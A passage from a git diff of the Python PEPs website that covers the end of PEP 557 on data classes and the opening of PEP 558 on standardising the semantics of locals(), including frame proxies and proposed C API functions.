    The newly returned object is created by calling the __init__ +method of the Data Class. This ensures that +__post_init__, if present, is also called.

    +

    Init-only variables without default values, if any exist, must be +specified on the call to replace so that they can be passed to +__init__ and __post_init__.

    +

    It is an error for changes to contain any fields that are +defined as having init=False. A ValueError will be raised +in this case.

    +

    Be forewarned about how init=False fields work during a call to +replace(). They are not copied from the source object, but +rather are initialized in __post_init__(), if they’re +initialized at all. It is expected that init=False fields will +be rarely and judiciously used. If they are used, it might be wise +to have alternate class constructors, or perhaps a custom +replace() (or similarly named) method which handles instance +copying.

    +
  • +
  • is_dataclass(class_or_instance): Returns True if its parameter +is a dataclass or an instance of one, otherwise returns False.

    If you need to know if a class is an instance of a dataclass (and +not a dataclass itself), then add a further check for not +isinstance(obj, type):

    +
    def is_dataclass_instance(obj):
    +    return is_dataclass(obj) and not isinstance(obj, type)
    +
    +
    +
  • +
+
+
+
+

Discussion

+
+

python-ideas discussion

+

This discussion started on python-ideas [9] and was moved to a GitHub +repo [10] for further discussion. As part of this discussion, we made +the decision to use PEP 526 syntax to drive the discovery of fields.

+
+
+

Support for automatically setting __slots__?

+

At least for the initial release, __slots__ will not be supported. +__slots__ needs to be added at class creation time. The Data +Class decorator is called after the class is created, so in order to +add __slots__ the decorator would have to create a new class, set +__slots__, and return it. Because this behavior is somewhat +surprising, the initial version of Data Classes will not support +automatically setting __slots__. There are a number of +workarounds:

+
    +
  • Manually add __slots__ in the class definition.
  • +
  • Write a function (which could be used as a decorator) that inspects +the class using fields() and creates a new class with +__slots__ set.
  • +
+

For more discussion, see [11].

+
+
+

Why not just use namedtuple?

+
    +
  • Any namedtuple can be accidentally compared to any other with the +same number of fields. For example: Point3D(2017, 6, 2) == +Date(2017, 6, 2). With Data Classes, this would return False.
  • +
  • A namedtuple can be accidentally compared to a tuple. For example, +Point2D(1, 10) == (1, 10). With Data Classes, this would return +False.
  • +
  • Instances are always iterable, which can make it difficult to add +fields. If a library defines:
    Time = namedtuple('Time', ['hour', 'minute'])
    +def get_time():
    +    return Time(12, 0)
    +
    +
    +

    Then if a user uses this code as:

    +
    hour, minute = get_time()
    +
    +
    +

    then it would not be possible to add a second field to Time +without breaking the user’s code.

    +
  • +
  • No option for mutable instances.
  • +
  • Cannot specify default values.
  • +
  • Cannot control which fields are used for __init__, __repr__, +etc.
  • +
  • Cannot support combining fields by inheritance.
  • +
+
+
+

Why not just use typing.NamedTuple?

+

For classes with statically defined fields, it does support similar +syntax to Data Classes, using type annotations. This produces a +namedtuple, so it shares namedtuple's benefits and some of its +downsides. Data Classes, unlike typing.NamedTuple, support +combining fields via inheritance.

+
+
+

Why not just use attrs?

+
    +
• attrs moves faster than could be accommodated if it were moved into +the standard library.
  • +
  • attrs supports additional features not being proposed here: +validators, converters, metadata, etc. Data Classes makes a +tradeoff to achieve simplicity by not implementing these +features.
  • +
+

For more discussion, see [12].


post-init parameters

In an earlier version of this PEP before InitVar was added, the post-init function __post_init__ never took any parameters.

The normal way of doing parameterized initialization (and not just with Data Classes) is to provide an alternate classmethod constructor. For example:

from dataclasses import dataclass

@dataclass
class C:
    x: int

    @classmethod
    def from_file(cls, filename):
        with open(filename) as fl:
            file_value = int(fl.read())
        return C(file_value)

c = C.from_file('file.txt')

Because the __post_init__ function is the last thing called in the generated __init__, having a classmethod constructor (which can also execute code immediately after constructing the object) is functionally equivalent to being able to pass parameters to a __post_init__ function.

With InitVars, __post_init__ functions can now take parameters. They are passed first to __init__ which passes them to __post_init__ where user code can use them as needed.
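A minimal sketch of the resulting pattern (the database parameter and its lookup() method are hypothetical stand-ins for a real context object):

from dataclasses import dataclass, InitVar

@dataclass
class C:
    i: int
    j: int = None
    database: InitVar[object] = None  # init-only pseudo-field, not stored on instances

    def __post_init__(self, database):
        # database is passed from __init__ straight through to __post_init__
        if self.j is None and database is not None:
            self.j = database.lookup('j')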

The only real difference between alternate classmethod constructors and InitVar pseudo-fields is in regards to required non-field parameters during object creation. With InitVars, when using __init__ or the module-level replace() function, InitVars must always be specified. Consider the case where a context object is needed to create an instance, but isn’t stored as a field. With alternate classmethod constructors the context parameter is always optional, because you could still create the object by going through __init__ (unless you suppress its creation). Which approach is more appropriate will be application-specific, but both approaches are supported.

Another reason for using InitVar fields is that the class author can control the order of __init__ parameters. This is especially important with regular fields and InitVar fields that have default values, as all fields with defaults must come after all fields without defaults. A previous design had all init-only fields coming after regular fields. This meant that if any field had a default value, then all init-only fields would have to have default values, too.


asdict and astuple function names

The names of the module-level helper functions asdict() and astuple() are arguably not PEP 8 compliant, and should be as_dict() and as_tuple(), respectively. However, after discussion [13] it was decided to keep consistency with namedtuple._asdict() and attr.asdict().


Rejected ideas


Copying init=False fields after new object creation in replace()

Fields that are init=False are by definition not passed to __init__, but instead are initialized with a default value, or by calling a default factory function in __init__, or by code in __post_init__.

A previous version of this PEP specified that init=False fields would be copied from the source object to the newly created object after __init__ returned, but that was deemed to be inconsistent with using __init__ and __post_init__ to initialize the new object. For example, consider this case:

from dataclasses import dataclass, field, replace

@dataclass
class Square:
    length: float
    area: float = field(init=False, default=0.0)

    def __post_init__(self):
        self.area = self.length * self.length

s1 = Square(1.0)
s2 = replace(s1, length=2.0)

If init=False fields were copied from the source to the destination object after __post_init__ is run, then s2 would end up being Square(length=2.0, area=1.0), instead of the correct Square(length=2.0, area=4.0).


Automatically support mutable default values

One proposal was to automatically copy defaults, so that if a literal list [] was a default value, each instance would get a new list. There were undesirable side effects of this decision, so the final decision is to disallow the 3 known built-in mutable types: list, dict, and set. For a complete discussion of this and other options, see [14].
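A short sketch of the resulting behaviour (the documented alternative for mutable defaults is default_factory):

from dataclasses import dataclass, field

@dataclass
class D:
    # x: list = []  would be rejected with a ValueError at class creation time
    x: list = field(default_factory=list)  # each instance gets a fresh list

assert D().x is not D().x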

Examples


Custom __init__ method

Sometimes the generated __init__ method does not suffice. For example, suppose you wanted to have an object to store *args and **kwargs:

from dataclasses import dataclass
from typing import Any, List, Mapping

@dataclass(init=False)
class ArgHolder:
    args: List[Any]
    kwargs: Mapping[Any, Any]

    def __init__(self, *args, **kwargs):
        self.args = args
        self.kwargs = kwargs

a = ArgHolder(1, 2, three=3)

A complicated example


This code exists in a closed source project:

class Application:
    def __init__(self, name, requirements, constraints=None, path='', executable_links=None, executables_dir=()):
        self.name = name
        self.requirements = requirements
        self.constraints = {} if constraints is None else constraints
        self.path = path
        self.executable_links = [] if executable_links is None else executable_links
        self.executables_dir = executables_dir
        self.additional_items = []

    def __repr__(self):
        return f'Application({self.name!r},{self.requirements!r},{self.constraints!r},{self.path!r},{self.executable_links!r},{self.executables_dir!r},{self.additional_items!r})'

This can be replaced by:

@dataclass
class Application:
    name: str
    requirements: List[Requirement]
    constraints: Dict[str, str] = field(default_factory=dict)
    path: str = ''
    executable_links: List[str] = field(default_factory=list)
    executables_dir: Tuple[str] = ()
    additional_items: List[str] = field(init=False, default_factory=list)

The Data Class version is more declarative, has less code, supports typing, and includes the other generated functions.


Acknowledgements

The following people provided invaluable input during the development of this PEP and code: Ivan Levkivskyi, Guido van Rossum, Hynek Schlawack, Raymond Hettinger, and Lisa Roach. I thank them for their time and expertise.

A special mention must be made about the attrs project. It was a true inspiration for this PEP, and I respect the design decisions they made.


References


Source: https://github.com/python/peps/blob/main/peps/pep-0557.rst


Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0558/index.html b/pep-0558/index.html
new file mode 100644
index 00000000000..6ca58fd0f18
--- /dev/null
+++ b/pep-0558/index.html
@@ -0,0 +1,1641 @@

PEP 558 – Defined semantics for locals()

Author: Alyssa Coghlan <ncoghlan at gmail.com>
BDFL-Delegate: Nathaniel J. Smith
Discussions-To: Python-Dev list
Status: Withdrawn
Type: Standards Track
Created: 08-Sep-2017
Python-Version: 3.13
Post-History: 08-Sep-2017, 22-May-2019, 30-May-2019, 30-Dec-2019, 18-Jul-2021, 26-Aug-2021

PEP Withdrawal

In December 2021, this PEP and PEP 667 converged on a common definition of the proposed changes to the Python level semantics of the locals() builtin (as documented in the PEP text below), with the only remaining differences being in the proposed C API changes and various internal implementation details.

Of those remaining differences, the most significant one was that PEP 667 at the time still proposed an immediate backwards compatibility break for the PyEval_GetLocals() API as soon as the PEP was accepted and implemented.

PEP 667 has since been changed to propose a generous deprecation period for the PyEval_GetLocals() API, continuing to support it in parallel with the improved semantics offered by the new PyEval_GetFrameLocals() API.

Any remaining C API design concerns relate to new informational APIs that can be added at a later date if they are deemed necessary, and any potential concerns about the exact performance characteristics of the frame locals view implementation are outweighed by the availability of a viable reference implementation.

Accordingly, this PEP has been withdrawn in favour of proceeding with PEP 667.

Note: while implementing PEP 667 it became apparent that the rationale for and impact of locals() being updated to return independent snapshots in optimized scopes was not entirely clear in either PEP. The Motivation and Rationale sections in this PEP have been updated accordingly (since those aspects are equally applicable to the accepted PEP 667).

Abstract

The semantics of the locals() builtin have historically been underspecified and hence implementation dependent.

This PEP proposes formally standardising on the behaviour of the CPython 3.10 reference implementation for most execution scopes, with some adjustments to the behaviour at function scope to make it more predictable and independent of the presence or absence of tracing functions.

In addition, it proposes that the following functions be added to the stable Python C API/ABI:

typedef enum {
  PyLocals_UNDEFINED = -1,
  PyLocals_DIRECT_REFERENCE = 0,
  PyLocals_SHALLOW_COPY = 1,
  _PyLocals_ENSURE_32BIT_ENUM = 2147483647
} PyLocals_Kind;

PyLocals_Kind PyLocals_GetKind();
PyObject * PyLocals_Get();
PyObject * PyLocals_GetCopy();

It also proposes the addition of several supporting functions and type definitions to the CPython C API.

Motivation

While the precise semantics of the locals() builtin are nominally undefined, in practice, many Python programs depend on it behaving exactly as it behaves in CPython (at least when no tracing functions are installed).

Other implementations such as PyPy are currently replicating that behaviour, up to and including replication of local variable mutation bugs that can arise when a trace hook is installed [1].

While this PEP considers CPython’s current behaviour when no trace hooks are installed to be largely acceptable, it considers the current behaviour when trace hooks are installed to be problematic, as it causes bugs like [1] without even reliably enabling the desired functionality of allowing debuggers like pdb to mutate local variables [3].

Review of the initial PEP and the draft implementation then identified an opportunity for simplification of both the documentation and implementation of the function level locals() behaviour by updating it to return an independent snapshot of the function locals and closure variables on each call, rather than continuing to return the semi-dynamic intermittently updated shared copy that it has historically returned in CPython.

Specifically, the proposal in this PEP eliminates the historical behaviour where adding a new local variable can change the behaviour of code executed with exec() in function scopes, even if that code runs before the local variable is defined.

For example:

def f():
    exec("x = 1")
    print(locals().get("x"))
f()

prints 1, but:

def f():
    exec("x = 1")
    print(locals().get("x"))
    x = 0
f()

prints None (the default value from the .get() call).

With this PEP both examples would print None, as the call to exec() and the subsequent call to locals() would use independent dictionary snapshots of the local variables rather than using the same shared dictionary cached on the frame object.

Proposal

The expected semantics of the locals() builtin change based on the current execution scope. For this purpose, the defined scopes of execution are:

• module scope: top-level module code, as well as any other code executed using exec() or eval() with a single namespace
• class scope: code in the body of a class statement, as well as any other code executed using exec() or eval() with separate local and global namespaces
• function scope: code in the body of a def or async def statement, or any other construct that creates an optimized code block in CPython (e.g. comprehensions, lambda functions)

This PEP proposes elevating most of the current behaviour of the CPython reference implementation to become part of the language specification, except that each call to locals() at function scope will create a new dictionary object, rather than caching a common dict instance in the frame object that each invocation will update and return.

This PEP also proposes to largely eliminate the concept of a separate “tracing” mode from the CPython reference implementation. In releases up to and including Python 3.10, the CPython interpreter behaves differently when a trace hook has been registered in one or more threads via an implementation dependent mechanism like sys.settrace ([4]) in CPython’s sys module or PyEval_SetTrace ([5]) in CPython’s C API. If this PEP is accepted, then the only remaining behavioural difference when a trace hook is installed is that some optimisations in the interpreter eval loop are disabled when the tracing logic needs to run after each opcode.

This PEP proposes changes to CPython’s behaviour at function scope that make the locals() builtin semantics when a trace hook is registered identical to those used when no trace hook is registered, while also making the related frame API semantics clearer and easier for interactive debuggers to rely on.

The proposed elimination of tracing mode affects the semantics of frame object references obtained through other means, such as via a traceback, or via the sys._getframe() API, as the write-through semantics needed for trace hook support are always provided by the f_locals attribute on frame objects, rather than being runtime state dependent.

New locals() documentation

The heart of this proposal is to revise the documentation for the locals() builtin to read as follows:

    Return a mapping object representing the current local symbol table, with variable names as the keys, and their currently bound references as the values.

    At module scope, as well as when using exec() or eval() with a single namespace, this function returns the same namespace as globals().

    At class scope, it returns the namespace that will be passed to the metaclass constructor.

    When using exec() or eval() with separate local and global namespaces, it returns the local namespace passed in to the function call.

    In all of the above cases, each call to locals() in a given frame of execution will return the same mapping object. Changes made through the mapping object returned from locals() will be visible as bound, rebound, or deleted local variables, and binding, rebinding, or deleting local variables will immediately affect the contents of the returned mapping object.

    At function scope (including for generators and coroutines), each call to locals() instead returns a fresh dictionary containing the current bindings of the function’s local variables and any nonlocal cell references. In this case, name binding changes made via the returned dict are not written back to the corresponding local variables or nonlocal cell references, and binding, rebinding, or deleting local variables and nonlocal cell references does not affect the contents of previously returned dictionaries.

There would also be a versionchanged note for the release making this change:

    In prior versions, the semantics of mutating the mapping object returned from locals() were formally undefined. In CPython specifically, the mapping returned at function scope could be implicitly refreshed by other operations, such as calling locals() again, or the interpreter implicitly invoking a Python level trace function. Obtaining the legacy CPython behaviour now requires explicit calls to update the initially returned dictionary with the results of subsequent calls to locals().

For reference, the current documentation of this builtin reads as follows:

    Update and return a dictionary representing the current local symbol table. Free variables are returned by locals() when it is called in function blocks, but not in class blocks.

    Note: The contents of this dictionary should not be modified; changes may not affect the values of local and free variables used by the interpreter.

(In other words: the status quo is that the semantics and behaviour of locals() are formally implementation defined, whereas the proposed state after this PEP is that the only implementation defined behaviour will be that associated with whether or not the implementation emulates the CPython frame API, with the behaviour in all other cases being defined by the language and library references.)


Module scope

At module scope, as well as when using exec() or eval() with a single namespace, locals() must return the same object as globals(), which must be the actual execution namespace (available as inspect.currentframe().f_locals in implementations that provide access to frame objects).

Variable assignments during subsequent code execution in the same scope must dynamically change the contents of the returned mapping, and changes to the returned mapping must change the values bound to local variable names in the execution environment.

To capture this expectation as part of the language specification, the following paragraph will be added to the documentation for locals():

    At module scope, as well as when using exec() or eval() with a single namespace, this function returns the same namespace as globals().

This part of the proposal does not require any changes to the reference implementation - it is standardisation of the current behaviour.
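For illustration, this standardised behaviour can already be observed in current CPython by running the following at module scope:

ns = locals()          # module scope: the same object as globals()
assert ns is globals()

x = 1                  # later assignments show up in the returned mapping...
assert ns["x"] == 1

ns["y"] = 2            # ...and writes to the mapping bind real module names
assert y == 2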


Class scope

At class scope, as well as when using exec() or eval() with separate global and local namespaces, locals() must return the specified local namespace (which may be supplied by the metaclass __prepare__ method in the case of classes). As for module scope, this must be a direct reference to the actual execution namespace (available as inspect.currentframe().f_locals in implementations that provide access to frame objects).

Variable assignments during subsequent code execution in the same scope must change the contents of the returned mapping, and changes to the returned mapping must change the values bound to local variable names in the execution environment.

The mapping returned by locals() will not be used as the actual class namespace underlying the defined class (the class creation process will copy the contents to a fresh dictionary that is only accessible by going through the class machinery).

For nested classes defined inside a function, any nonlocal cells referenced from the class scope are not included in the locals() mapping.

To capture this expectation as part of the language specification, the following two paragraphs will be added to the documentation for locals():

    When using exec() or eval() with separate local and global namespaces, [this function] returns the given local namespace.

    At class scope, it returns the namespace that will be passed to the metaclass constructor.

This part of the proposal does not require any changes to the reference implementation - it is standardisation of the current behaviour.
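Again purely for illustration, a sketch of the corresponding current behaviour at class scope:

class C:
    x = 1
    ns = locals()      # a direct reference to the class body namespace
    assert ns["x"] == 1
    ns["y"] = 2        # binding through the mapping creates a real name
    assert y == 2

assert C.y == 2        # the binding survives into the created class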


Function scope

At function scope, interpreter implementations are granted significant freedom to optimise local variable access, and hence are NOT required to permit arbitrary modification of local and nonlocal variable bindings through the mapping returned from locals().

Historically, this leniency has been described in the language specification with the words “The contents of this dictionary should not be modified; changes may not affect the values of local and free variables used by the interpreter.”

This PEP proposes to change that text to instead say:

    At function scope (including for generators and coroutines), each call to locals() instead returns a fresh dictionary containing the current bindings of the function’s local variables and any nonlocal cell references. In this case, name binding changes made via the returned dict are not written back to the corresponding local variables or nonlocal cell references, and binding, rebinding, or deleting local variables and nonlocal cell references does not affect the contents of previously returned dictionaries.

This part of the proposal does require changes to the CPython reference implementation, as CPython currently returns a shared mapping object that may be implicitly refreshed by additional calls to locals(), and the “write back” strategy currently used to support namespace changes from trace functions also doesn’t comply with it (and causes the quirky behavioural problems mentioned in the Motivation above).
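A sketch of how function scope code would behave under the proposed semantics (note that this illustrates the proposal, not the historical CPython behaviour):

def f():
    x = 1
    snapshot = locals()          # independent snapshot under this proposal
    x = 2
    assert snapshot["x"] == 1    # the earlier snapshot is unaffected...
    assert locals()["x"] == 2    # ...while a fresh call sees the rebinding
    snapshot["x"] = 99           # writes to a snapshot never reach the real local
    assert x == 2

f()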


CPython Implementation Changes


Summary of proposed implementation-specific changes

• Changes are made as necessary to provide the updated Python level semantics
• Two new functions are added to the stable ABI to replicate the updated behaviour of the Python locals() builtin:

  PyObject * PyLocals_Get();
  PyLocals_Kind PyLocals_GetKind();

• One new function is added to the stable ABI to efficiently get a snapshot of the local namespace in the running frame:

  PyObject * PyLocals_GetCopy();

• Corresponding frame accessor functions for these new public APIs are added to the CPython frame C API
• On optimised frames, the Python level f_locals API will return dynamically created read/write proxy objects that directly access the frame’s local and closure variable storage. To provide interoperability with the existing PyEval_GetLocals() API, the proxy objects will continue to use the C level frame locals data storage field to hold a value cache that also allows for storage of arbitrary additional keys. Additional details on the expected behaviour of these fast locals proxy objects are covered below.
• No C API function is added to get access to a mutable mapping for the local namespace. Instead, PyObject_GetAttrString(frame, "f_locals") is used, the same API as is used in Python code.
• PyEval_GetLocals() remains supported and does not emit a programmatic warning, but will be deprecated in the documentation in favour of the new APIs that don’t rely on returning a borrowed reference
• PyFrame_FastToLocals() and PyFrame_FastToLocalsWithError() remain supported and do not emit a programmatic warning, but will be deprecated in the documentation in favour of the new APIs that don’t require direct access to the internal data storage layout of frame objects
• PyFrame_LocalsToFast() always raises RuntimeError(), indicating that PyObject_GetAttrString(frame, "f_locals") should be used to obtain a mutable read/write mapping for the local variables.
• The trace hook implementation will no longer call PyFrame_FastToLocals() implicitly. The version porting guide will recommend migrating to PyFrame_GetLocals() for read-only access and PyObject_GetAttrString(frame, "f_locals") for read/write access.

Providing the updated Python level semantics

The implementation of the locals() builtin is modified to return a distinct copy of the local namespace for optimised frames, rather than a direct reference to the internal frame value cache updated by the PyFrame_FastToLocals() C API and returned by the PyEval_GetLocals() C API.

Resolving the issues with tracing mode behaviour

The current cause of CPython’s tracing mode quirks (both the side effects from simply installing a tracing function and the fact that writing values back to function locals only works for the specific function being traced) is the way that locals mutation support for trace hooks is currently implemented: the PyFrame_LocalsToFast function.

When a trace function is installed, CPython currently does the following for function frames (those where the code object uses “fast locals” semantics):

1. Calls PyFrame_FastToLocals to update the frame value cache
2. Calls the trace hook (with tracing of the hook itself disabled)
3. Calls PyFrame_LocalsToFast to capture any changes made to the frame value cache

This approach is problematic for a few different reasons:

• Even if the trace function doesn’t mutate the value cache, the final step resets any cell references back to the state they were in before the trace function was called (this is the root cause of the bug report in [1])
• If the trace function does mutate the value cache, but then does something that causes the value cache to be refreshed from the frame, those changes are lost (this is one aspect of the bug report in [3])
• If the trace function attempts to mutate the local variables of a frame other than the one being traced (e.g. frame.f_back.f_locals), those changes will almost certainly be lost (this is another aspect of the bug report in [3])
• If a reference to the frame value cache (e.g. retrieved via locals()) is passed to another function, and that function mutates the value cache, then those changes may be written back to the execution frame if a trace hook is installed

The proposed resolution to this problem is to take advantage of the fact that whereas functions typically access their own namespace using the language defined locals() builtin, trace functions necessarily use the implementation dependent frame.f_locals interface, as a frame reference is what gets passed to hook implementations.

Instead of being a direct reference to the internal frame value cache historically returned by the locals() builtin, the Python level frame.f_locals will be updated to instead return instances of a dedicated fast locals proxy type that writes and reads values directly to and from the fast locals array on the underlying frame. Each access of the attribute produces a new instance of the proxy (so creating proxy instances is intentionally a cheap operation).

Despite the new proxy type becoming the preferred way to access local variables on optimised frames, the internal value cache stored on the frame is still retained for two key purposes:

• maintaining backwards compatibility for and interoperability with the PyEval_GetLocals() C API
• providing storage space for additional keys that don’t have slots in the fast locals array (e.g. the __return__ and __exception__ keys set by pdb when tracing code execution for debugging purposes)

With the changes in this PEP, this internal frame value cache is no longer directly accessible from Python code (whereas historically it was both returned by the locals() builtin and available as the frame.f_locals attribute). Instead, the value cache is only accessible via the PyEval_GetLocals() C API and by directly accessing the internal storage of a frame object.

Fast locals proxy objects and the internal frame value cache returned by PyEval_GetLocals() offer the following behavioural guarantees:

• changes made via a fast locals proxy will be immediately visible to the frame itself, to other fast locals proxy objects for the same frame, and in the internal value cache stored on the frame (it is this last point that provides PyEval_GetLocals() interoperability)
• changes made directly to the internal frame value cache will never be visible to the frame itself, and will only be reliably visible via fast locals proxies for the same frame if the change relates to extra variables that don’t have slots in the frame’s fast locals array
• changes made by executing code in the frame will be immediately visible to all fast locals proxy objects for that frame (both existing proxies and newly created ones). Visibility in the internal frame value cache returned by PyEval_GetLocals() is subject to the cache update guidelines discussed in the next section

As a result of these points, only code using PyEval_GetLocals(), PyLocals_Get(), or PyLocals_GetCopy() will need to be concerned about the frame value cache potentially becoming stale. Code using the new frame fast locals proxy API (whether from Python or from C) will always see the live state of the frame.

Fast locals proxy implementation details

Each fast locals proxy instance has a single internal attribute that is not exposed as part of the Python runtime API:

• frame: the underlying optimised frame that the proxy provides access to

In addition, proxy instances use and update the following attributes stored on the underlying frame or code object:

• _name_to_offset_mapping: a hidden mapping from variable names to fast local storage offsets. This mapping is lazily initialized on the first frame read or write access through a fast locals proxy, rather than being eagerly populated as soon as the first fast locals proxy is created. Since the mapping is identical for all frames running a given code object, a single copy is stored on the code object, rather than each frame object populating its own mapping
• locals: the internal frame value cache returned by the PyEval_GetLocals() C API and updated by the PyFrame_FastToLocals() C API. This is the mapping that the locals() builtin returns in Python 3.10 and earlier.

__getitem__ operations on the proxy will populate the _name_to_offset_mapping on the code object (if it is not already populated), and then either return the relevant value (if the key is found in either the _name_to_offset_mapping mapping or the internal frame value cache), or else raise KeyError. Variables that are defined on the frame but not currently bound also raise KeyError (just as they’re omitted from the result of locals()).

As the frame storage is always accessed directly, the proxy will automatically pick up name binding and unbinding operations that take place as the function executes. The internal value cache is implicitly updated when individual variables are read from the frame state (including for containment checks, which need to check if the name is currently bound or unbound).

Similarly, __setitem__ and __delitem__ operations on the proxy will directly affect the corresponding fast local or cell reference on the underlying frame, ensuring that changes are immediately visible to the running Python code, rather than needing to be written back to the runtime storage at some later time. Such changes are also immediately written to the internal frame value cache to make them visible to users of the PyEval_GetLocals() C API.

Keys that are not defined as local or closure variables on the underlying frame are still written to the internal value cache on optimised frames. This allows utilities like pdb (which writes __return__ and __exception__ values into the frame’s f_locals mapping) to continue working as they always have. These additional keys that do not correspond to a local or closure variable on the frame will be left alone by future cache sync operations. Using the frame value cache to store these extra keys (rather than defining a new mapping that holds only the extra keys) provides full interoperability with the existing PyEval_GetLocals() API (since users of either API will see extra keys added by users of either API, rather than users of the new fast locals proxy API only seeing keys added via that API).
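As a rough model of the rules described above (a toy Python sketch only; the real implementation is in C, and the Frame and UNBOUND names here are invented for illustration):

UNBOUND = object()  # hypothetical sentinel for defined-but-unbound slots

class Frame:
    """Stand-in for an optimised frame: fast slots plus a value cache."""
    def __init__(self, names):
        self.fast = {name: UNBOUND for name in names}  # fast locals "array"
        self.cache = {}  # what PyEval_GetLocals() would return

class FastLocalsProxy:
    """Write-through view over the frame's fast locals storage."""
    def __init__(self, frame):
        self.frame = frame

    def __getitem__(self, key):
        if key in self.frame.fast:
            value = self.frame.fast[key]
            if value is UNBOUND:
                raise KeyError(key)  # defined on the frame but not currently bound
            self.frame.cache[key] = value  # refresh the shared value cache on reads
            return value
        return self.frame.cache[key]  # extra keys (e.g. pdb's __return__)

    def __setitem__(self, key, value):
        if key in self.frame.fast:
            self.frame.fast[key] = value  # immediately visible to running code
        self.frame.cache[key] = value  # keep the PyEval_GetLocals() cache in sync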

An additional benefit of storing only the variable value cache on the frame (rather than storing an instance of the proxy type) is that it avoids creating a reference cycle from the frame back to itself, so the frame will only be kept alive if another object retains a reference to a proxy instance.

Note: calling the proxy.clear() method has a similarly broad impact as calling PyFrame_LocalsToFast() on an empty frame value cache in earlier versions. Not only will the frame local variables be cleared, but also any cell variables accessible from the frame (whether those cells are owned by the frame itself or by an outer frame). This can clear a class’s __class__ cell if called on the frame of a method that uses the zero-arg super() construct (or otherwise references __class__). This exceeds the scope of calling frame.clear(), as that only drops the frame’s references to cell variables, it doesn’t clear the cells themselves. This PEP could be a potential opportunity to narrow the scope of attempts to clear the frame variables directly by leaving cells belonging to outer frames alone, and only clearing local variables and cells belonging directly to the frame underlying the proxy (this issue affects PEP 667 as well, as the question relates to the handling of cell variables, and is entirely independent of the internal frame value cache).

Changes to the stable C API/ABI

Unlike Python code, extension module functions that call in to the Python C API can be called from any kind of Python scope. This means it isn’t obvious from the context whether locals() will return a snapshot or not, as it depends on the scope of the calling Python code, not the C code itself.

This means it is desirable to offer C APIs that give predictable, scope independent, behaviour. However, it is also desirable to allow C code to exactly mimic the behaviour of Python code at the same scope.

To enable mimicking the behaviour of Python code, the stable C ABI would gain the following new functions:

PyObject * PyLocals_Get();
PyLocals_Kind PyLocals_GetKind();

PyLocals_Get() is directly equivalent to the Python locals() builtin. It returns a new reference to the local namespace mapping for the active Python frame at module and class scope, and when using exec() or eval(). It returns a shallow copy of the active namespace at function/coroutine/generator scope.

PyLocals_GetKind() returns a value from the newly defined PyLocals_Kind enum, with the following options being available:

• PyLocals_DIRECT_REFERENCE: PyLocals_Get() returns a direct reference to the local namespace for the running frame.
• PyLocals_SHALLOW_COPY: PyLocals_Get() returns a shallow copy of the local namespace for the running frame.
• PyLocals_UNDEFINED: an error occurred (e.g. no active Python thread state). A Python exception will be set if this value is returned.

Since the enum is used in the stable ABI, an additional 31-bit value is set to ensure that it is safe to cast arbitrary signed 32-bit integers to PyLocals_Kind values.

This query API allows extension module code to determine the potential impact of mutating the mapping returned by PyLocals_Get() without needing access to the details of the running frame object. Python code gets equivalent information visually through lexical scoping (as covered in the new locals() builtin documentation).

To allow extension module code to behave consistently regardless of the active Python scope, the stable C ABI would gain the following new function:

PyObject * PyLocals_GetCopy();

PyLocals_GetCopy() returns a new dict instance populated from the current locals namespace. Roughly equivalent to dict(locals()) in Python code, but avoids the double-copy in the case where locals() already returns a shallow copy. Akin to the following code, but doesn’t assume there will only ever be two kinds of locals result:

locals = PyLocals_Get();
if (PyLocals_GetKind() == PyLocals_DIRECT_REFERENCE) {
    locals = PyDict_Copy(locals);
}

The existing PyEval_GetLocals() API will retain its existing behaviour in CPython (mutable locals at class and module scope, shared dynamic snapshot otherwise). However, its documentation will be updated to note that the conditions under which the shared dynamic snapshot gets updated have changed.

The PyEval_GetLocals() documentation will also be updated to recommend replacing usage of this API with whichever of the new APIs is most appropriate for the use case:

• Use PyLocals_Get() (optionally combined with PyDictProxy_New()) for read-only access to the current locals namespace. This form of usage will need to be aware that the copy may go stale in optimised frames.
• Use PyLocals_GetCopy() for a regular mutable dict that contains a copy of the current locals namespace, but has no ongoing connection to the active frame.
• Use PyLocals_Get() to exactly match the semantics of the Python level locals() builtin.
• Query PyLocals_GetKind() explicitly to implement custom handling (e.g. raising a meaningful exception) for scopes where PyLocals_Get() would return a shallow copy rather than granting read/write access to the locals namespace.
• Use implementation specific APIs (e.g. PyObject_GetAttrString(frame, "f_locals")) if read/write access to the frame is required and PyLocals_GetKind() returns something other than PyLocals_DIRECT_REFERENCE.

Changes to the public CPython C API

The existing PyEval_GetLocals() API returns a borrowed reference, which means it cannot be updated to return the new shallow copies at function scope. Instead, it will continue to return a borrowed reference to an internal dynamic snapshot stored on the frame object. This shared mapping will behave similarly to the existing shared mapping in Python 3.10 and earlier, but the exact conditions under which it gets refreshed will be different. Specifically, it will be updated only in the following circumstances:

• any call to PyEval_GetLocals(), PyLocals_Get(), PyLocals_GetCopy(), or the Python locals() builtin while the frame is running
• any call to PyFrame_GetLocals(), PyFrame_GetLocalsCopy(), _PyFrame_BorrowLocals(), PyFrame_FastToLocals(), or PyFrame_FastToLocalsWithError() for the frame
• any operation on a fast locals proxy object that updates the shared mapping as part of its implementation. In the initial reference implementation, those operations are those that are intrinsically O(n) operations (len(flp), mapping comparison, flp.copy() and rendering as a string), as well as those that refresh the cache entries for individual keys.

Requesting a fast locals proxy will not implicitly update the shared dynamic snapshot, and the CPython trace hook handling will no longer implicitly update it either.

(Note: even though PyEval_GetLocals() is part of the stable C API/ABI, the specifics of when the namespace it returns gets refreshed are still an interpreter implementation detail.)

The additions to the public CPython C API are the frame level enhancements needed to support the stable C API/ABI updates:

PyLocals_Kind PyFrame_GetLocalsKind(frame);
PyObject * PyFrame_GetLocals(frame);
PyObject * PyFrame_GetLocalsCopy(frame);
PyObject * _PyFrame_BorrowLocals(frame);

PyFrame_GetLocalsKind(frame) is the underlying API for PyLocals_GetKind().

PyFrame_GetLocals(frame) is the underlying API for PyLocals_Get().

PyFrame_GetLocalsCopy(frame) is the underlying API for PyLocals_GetCopy().

_PyFrame_BorrowLocals(frame) is the underlying API for PyEval_GetLocals(). The underscore prefix is intended to discourage use and to indicate that code using it is unlikely to be portable across implementations. However, it is documented and visible to the linker in order to avoid having to access the internals of the frame struct from the PyEval_GetLocals() implementation.

The PyFrame_LocalsToFast() function will be changed to always emit RuntimeError, explaining that it is no longer a supported operation, and affected code should be updated to use PyObject_GetAttrString(frame, "f_locals") to obtain a read/write proxy instead.

In addition to the above documented interfaces, the draft reference implementation also exposes the following undocumented interfaces:

PyTypeObject _PyFastLocalsProxy_Type;
#define _PyFastLocalsProxy_CheckExact(op) Py_IS_TYPE(op, &_PyFastLocalsProxy_Type)

